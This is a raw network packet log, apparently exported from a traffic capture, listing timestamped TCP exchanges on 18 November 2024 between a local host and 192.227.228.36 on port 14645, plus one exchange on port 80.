                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302073002 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302124977 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302135944 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302160025 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302753925 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302793980 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.302820921 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.303288937 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.372960091 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.372987032 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.372998953 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373045921 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373151064 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373163939 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373174906 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373189926 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373222113 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373425961 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373473883 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373507023 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373534918 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374013901 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374036074 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374047995 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374053001 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374083042 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374171019 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374182940 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374219894 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374530077 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374541044 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374553919 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374576092 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374819040 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374830008 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374857903 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421905994 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421947956 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421957970 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421966076 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422013998 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422084093 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422096014 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422106981 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422146082 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422595024 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422632933 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422658920 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422668934 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422700882 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422710896 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423219919 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423254967 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423285961 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423295975 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423333883 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423367977 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.468061924 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.468080044 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.468130112 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.499872923 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.499941111 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.499954939 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500024080 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500086069 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500118017 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500124931 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500176907 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500344992 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500483036 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500530005 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500638962 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500701904 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500715971 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500742912 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500822067 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500833035 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500845909 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500859976 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500884056 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501416922 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501466036 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501477957 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501502991 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.534926891 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.534993887 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.535007000 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.535021067 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.535114050 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542582035 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542726994 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542746067 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542781115 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542790890 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542794943 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542834997 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543006897 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543050051 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543097019 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543109894 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543148041 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543160915 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543670893 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543708086 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543709040 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543721914 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543766975 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543836117 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543848991 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543884993 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.588509083 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.588565111 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.588634014 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621124983 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621164083 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621177912 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621254921 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621325016 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621337891 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.621367931 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622004032 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622028112 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622040033 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622045994 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622076035 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622143030 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622214079 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622226000 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622255087 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622502089 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622540951 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622586012 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622596979 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622631073 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622786045 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622855902 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622890949 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622961044 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.622971058 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.623008966 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655556917 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655599117 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655612946 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655672073 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655684948 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655694962 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.655719995 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.662980080 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663009882 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663017035 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663069010 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663109064 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663151026 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663153887 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663213015 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663228035 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663255930 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663309097 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663388014 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663724899 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663791895 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663805008 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.663856983 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.664136887 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.664176941 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.664458036 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.664545059 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.664557934 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.664601088 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.709477901 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.709546089 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.709579945 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.709580898 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741512060 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741574049 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741588116 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741641998 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741698980 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741712093 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.741775036 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742250919 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742319107 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742327929 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742330074 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742425919 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742468119 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742480993 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742542982 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742856979 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742878914 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.742938042 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.743135929 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.743192911 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.743202925 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.743237972 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776007891 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776026964 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776040077 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776053905 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776094913 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776108980 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776134014 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776134968 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776148081 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776179075 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.776196003 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.803318977 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.862118959 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.862157106 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.862251997 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.862665892 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863080978 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863095999 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863162041 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863166094 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863179922 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863193989 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863207102 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863209963 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863229990 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.863996029 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864011049 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864025116 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864047050 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864067078 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864078999 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864080906 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.864128113 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896339893 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896375895 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896428108 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896831036 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896856070 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896876097 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896899939 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.897064924 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.897078991 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.897104979 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.942756891 CET8055651178.237.33.50192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.942817926 CET5565180192.168.2.8178.237.33.50
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.957469940 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982676029 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982691050 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982702971 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982721090 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982743979 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982764959 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982816935 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982897043 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982938051 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983117104 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983186007 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983197927 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983212948 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983241081 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983256102 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.983319998 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984112024 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984153032 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984153032 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984165907 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984208107 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984827042 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984927893 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.984967947 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017353058 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017406940 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017421007 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017432928 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017457008 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017478943 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:25.017540932 CET1464555650192.227.228.36192.168.2.8
